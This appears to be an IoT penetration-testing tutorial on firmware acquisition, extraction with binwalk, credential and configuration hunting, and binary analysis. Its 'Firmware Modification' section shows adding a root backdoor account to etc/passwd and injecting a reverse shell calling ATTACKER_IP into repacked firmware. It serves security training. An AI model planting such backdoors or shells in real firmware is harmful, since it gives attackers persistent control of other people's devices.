Firmware Analysis
Enumeration
Firmware analysis is often the most fruitful phase of IoT pentesting. Extracting and analyzing firmware can reveal hardcoded credentials, vulnerable services, encryption keys, and backdoors.
Firmware Acquisition
Download Sources
Official Sources
- • Manufacturer support pages
- • FCC filings (internal docs)
- • GPL source code releases
- • OTA update servers
Alternative Methods
- • UART shell access
- • SPI flash extraction
- • JTAG memory dump
- • Update interception (MITM)
bash
# Intercept firmware update
# Set device to use your proxy
mitmproxy -p 8080
# Look for update URLs like:
# https://update.vendor.com/fw/device_v1.2.3.bin
# https://s3.amazonaws.com/vendor-ota/firmware.bin
# Download firmware
wget https://vendor.com/support/firmware_v2.0.bin
curl -O https://vendor.com/download/latest.bin
# Check file type
file firmware.bin
binwalk firmware.binFirmware Extraction
Using Binwalk
bash
# Analyze firmware structure
binwalk firmware.bin
# Example output:
# DECIMAL HEXADECIMAL DESCRIPTION
# 0 0x0 uImage header, header size: 64 bytes
# 64 0x40 LZMA compressed data
# 1048576 0x100000 Squashfs filesystem, little endian
# Extract all identified components
binwalk -e firmware.bin
# Extract with Matryoshka (recursive extraction)
binwalk -Me firmware.bin
# Specify output directory
binwalk -e -C output_dir firmware.bin
# Extract specific file system
binwalk --dd='squashfs:squashfs' firmware.bin
unsquashfs squashfs-rootManual Extraction
bash
# Find magic bytes manually
hexdump -C firmware.bin | head -100
strings firmware.bin | head -50
# Common filesystem signatures:
# hsqs / sqsh - SquashFS
# JFFS2 - JFFS2 filesystem
# UBI# - UBI filesystem
# cramfs - CramFS
# Extract SquashFS manually
# Find offset from binwalk output
dd if=firmware.bin of=squashfs.bin bs=1 skip=1048576
unsquashfs squashfs.bin
# Extract JFFS2
dd if=firmware.bin of=jffs2.bin bs=1 skip=<offset>
jefferson jffs2.bin -d jffs2_extracted
# Mount extracted filesystem
sudo mount -o loop -t squashfs squashfs.bin /mnt/fwEncrypted/Compressed Firmware
bash
# Check for encryption
binwalk -E firmware.bin # Entropy analysis
# High entropy (>0.9) throughout = likely encrypted
# Common encryption scenarios:
# 1. XOR with static key
# 2. AES with hardcoded key
# 3. Custom encryption algorithm
# Finding encryption keys:
# - Check older firmware versions (may be unencrypted)
# - Analyze mobile app for decryption routines
# - Extract from bootloader
# - JTAG/UART memory dump
# XOR key discovery
xortool firmware.bin
xortool -c 00 firmware.bin # Try null byte as most common char
# Using firmware-mod-kit
./extract-firmware.sh firmware.binStatic Analysis
Credential Discovery
bash
# Search for hardcoded credentials
cd squashfs-root
# Password files
cat etc/passwd
cat etc/shadow
strings etc/shadow
# Search for password strings
grep -r "password" .
grep -r "passwd" .
grep -ri "admin" . --include="*.conf"
grep -ri "root:" .
# API keys and tokens
grep -rE "[a-zA-Z0-9]{32,}" .
grep -ri "api_key|apikey|api-key" .
grep -ri "secret|token" .
# SSH keys
find . -name "*.pem" -o -name "id_rsa*" -o -name "authorized_keys"
find . -name "*.key"
# Certificates
find . -name "*.crt" -o -name "*.cer" -o -name "*.p12"
# Database credentials
grep -ri "mysql|postgres|mongo|redis" . --include="*.conf"Configuration Analysis
bash
# Web server configs
cat etc/lighttpd/lighttpd.conf
cat etc/nginx/nginx.conf
cat etc/httpd.conf
# Network configuration
cat etc/network/interfaces
cat etc/config/network
cat etc/hosts
# Init scripts (often contain credentials)
ls etc/init.d/
cat etc/init.d/*
# Custom application configs
find . -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name "*.json"
# Check for debug modes
grep -ri "debug|verbose|test" . --include="*.conf"
# Look for backdoor accounts
grep -ri "support|service|backdoor|test" etc/passwdBinary Analysis
bash
# Identify architecture
file usr/bin/httpd
# Output: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1
# Common IoT architectures:
# - MIPS (many routers)
# - ARM (most modern IoT)
# - x86 (some industrial devices)
# Find interesting binaries
find . -executable -type f | head -20
# Strings analysis
strings -n 8 usr/bin/mainapp > strings.txt
strings usr/bin/mainapp | grep -i "password|admin|key"
# Check for known vulnerable functions
grep -l "strcpy|sprintf|gets|system" $(find . -executable -type f)
# Using Ghidra for reverse engineering
ghidraRun # Import binary and analyze
# Using radare2
r2 -A usr/bin/httpd
> afl # List functions
> s main # Seek to main
> pdf # Print disassemblyVulnerability Discovery
Web Interface Analysis
bash
# Find web files
find . -name "*.php" -o -name "*.cgi" -o -name "*.lua" -o -name "*.asp"
# Look for command injection
grep -rn "system|exec|popen|passthru|shell_exec" www/
grep -rn "os.system|subprocess" www/
# Authentication bypass patterns
grep -rn "strcmp|strncmp" www/*.cgi
grep -rn "admin|login|auth" www/
# Analyze CGI binaries
strings www/cgi-bin/admin.cgi | grep -i "password"
# Check for path traversal
grep -rn "../" www/
# Look for hardcoded session tokens
grep -rn "session|cookie|token" www/Known Vulnerable Components
bash
# Check BusyBox version (often outdated)
strings bin/busybox | grep "BusyBox v"
# Check OpenSSL version
strings usr/lib/libssl.so* | grep "OpenSSL"
# Check for known CVEs
# Compare versions against:
# - https://cve.mitre.org
# - https://nvd.nist.gov
# Common vulnerable components in IoT:
# - GoAhead web server
# - lighttpd
# - uClibc
# - Dropbear SSH
# - OpenWrt components
# Generate SBOM (Software Bill of Materials)
# List all binaries and libraries
find . -type f -executable -exec file {} ; | grep ELF
find . -name "*.so*" -exec strings {} ; | grep -i "version"Automated Analysis Tools
EMBA - Embedded Analyzer
bash
# Clone EMBA
git clone https://github.com/e-m-b-a/emba.git
cd emba
# Install dependencies
./installer.sh
# Run analysis
sudo ./emba.sh -f ~/firmware.bin -l ~/emba_logs
# EMBA checks:
# - Hardcoded passwords
# - Vulnerable binaries
# - Known CVEs
# - Weak configurations
# - Outdated softwareFirmwalker
bash
# Clone firmwalker
git clone https://github.com/craigz28/firmwalker.git
cd firmwalker
# Run against extracted filesystem
./firmwalker.sh /path/to/squashfs-root/
# Searches for:
# - etc/passwd and shadow files
# - SSL certificates and keys
# - Configuration files
# - Scripts containing IPs/URLs
# - Database filesFirmware Analysis Toolkit (FAT)
bash
# Using FAT Docker container
docker pull firmadyne/firmadyne
# Or use attify firmware toolkit
# https://github.com/attify/firmware-analysis-toolkit
# For full emulation:
# Firmadyne - https://github.com/firmadyne/firmadyne
# Provides network-capable emulation of firmwareFirmware Emulation
For dynamic analysis, consider using QEMU or Firmadyne to emulate the firmware.
This allows testing vulnerabilities without physical hardware access.
Firmware Modification
bash
# Modify extracted filesystem
cd squashfs-root
# Add backdoor user
echo 'backdoor:$1$xyz$abc123:0:0:root:/root:/bin/sh' >> etc/passwd
# Enable telnet/SSH
# Edit init scripts to start services
# Inject reverse shell
cat > usr/bin/shell.sh << 'EOF'
#!/bin/sh
/bin/sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
EOF
chmod +x usr/bin/shell.sh
# Repack firmware
mksquashfs squashfs-root new_squashfs.bin -comp xz
# Rebuild full firmware image
# (May require header recreation, CRC updates)
# Use firmware-mod-kit for full rebuild
./build-firmware.shLegal Notice
Modifying firmware and re-flashing devices should only be done on devices you own
or have explicit authorization to test. Distributing modified firmware may violate
copyright and computer fraud laws.
Analysis Checklist
- ☐ Extract firmware with binwalk
- ☐ Identify filesystem type and architecture
- ☐ Search for hardcoded credentials
- ☐ Analyze /etc/passwd and /etc/shadow
- ☐ Find SSL certificates and private keys
- ☐ Check configuration files for secrets
- ☐ Identify web application vulnerabilities
- ☐ Check for command injection in CGI/scripts
- ☐ List all services and their versions
- ☐ Search for known CVEs in components
- ☐ Analyze custom binaries with Ghidra/r2
- ☐ Test for unsigned update vulnerabilities